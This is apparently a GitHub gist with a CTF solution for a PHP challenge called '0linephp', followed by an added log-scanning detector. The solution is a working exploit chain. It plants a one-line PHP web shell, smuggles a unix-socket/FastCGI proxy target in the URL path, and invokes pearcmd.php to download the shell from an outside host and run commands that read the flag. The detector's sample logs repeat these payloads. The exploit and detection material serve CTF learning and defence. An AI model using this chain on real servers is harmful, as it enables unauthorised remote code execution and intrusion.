@ginoah
Created January 1, 2022 06:29
Solution for 0linephp

0linephp

Web shell

Host a simple web server that redirects / to shell.php

index.php

<?php
  header('Location: http://1.3.3.7/shell.php');
?>

shell.php

<?='<?=system($_GET["c"]);?>'?>

Exploit

from urllib.request import urlopen

# challenge's host
host = 'http://target'

pearcmd = "/usr/local/lib/php/pearcmd.php?argv=+install+--installroot+/+http://1.3.3.7/" # your ip
payload = f"/index.php/unix:{'A'*5000}|fcgi://php:9000{pearcmd}"
urlopen(f"{host}{payload}")

shell = f"/tmp/pear/download/shell.php?c=cat+/flag"
payload = f"/index.php/unix:{'A'*5000}|fcgi://php:9000{shell}"
r = urlopen(f"{host}{payload}")
print(r.read())
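
Detection (added example, not part of the original gist): a log scanner that flags the three request shapes the exploit script above produces, namely a `unix:...|scheme://` proxy target in the path, `pearcmd.php` called over HTTP with `argv=`, and a `.php` file requested from the PEAR download directory. The rule names, the helper functions and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Pulls the request URI out of a common/combined-format access log line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Rule names are made up for this example; each one matches a request
# shape visible in the exploit script above.
RULES = {
    # "/unix:<padding>|<scheme>://" embedded in the request path
    "proxy-target-smuggling": re.compile(r"/unix:[^|\s]*\|[a-z][a-z0-9+.\-]*://", re.I),
    # pearcmd.php reached over HTTP with CLI arguments in the query string
    "pearcmd-over-http": re.compile(r"pearcmd\.php\?\S*argv=", re.I),
    # a PHP file requested from PEAR's download directory
    "php-in-pear-download-dir": re.compile(r"/pear/download/[^/?\s]+\.php", re.I),
}

def classify(uri):
    """Return the sorted names of all rules matching the percent-decoded URI."""
    decoded = unquote(uri)
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def scan(lines):
    """Return (line_number, rule_names) for every log line that matches a rule."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        tags = classify(m.group(1)) if m else []
        if tags:
            hits.append((lineno, tags))
    return hits

# Constructed sample log (not captured traffic).
PAD = "A" * 5000
TS = "[01/Jan/2022:06:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.5 - - {TS} "GET /index.php HTTP/1.1" 200 12',
    f'203.0.113.5 - - {TS} "GET /index.php/unix:{PAD}|fcgi://php:9000'
    '/usr/local/lib/php/pearcmd.php?argv=+install+--installroot+/+http://1.3.3.7/ HTTP/1.1" 200 310',
    f'203.0.113.5 - - {TS} "GET /index.php/unix:{PAD}|fcgi://php:9000'
    '/tmp/pear/download/shell.php?c=cat+/flag HTTP/1.1" 200 40',
    f'198.51.100.9 - - {TS} "GET /docs/unix-sockets.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, tags in scan(SAMPLE_LOG):
        print(lineno, ", ".join(tags))
```

The URI is percent-decoded before matching, so an encoded `|` (`%7C`) in the path is still caught.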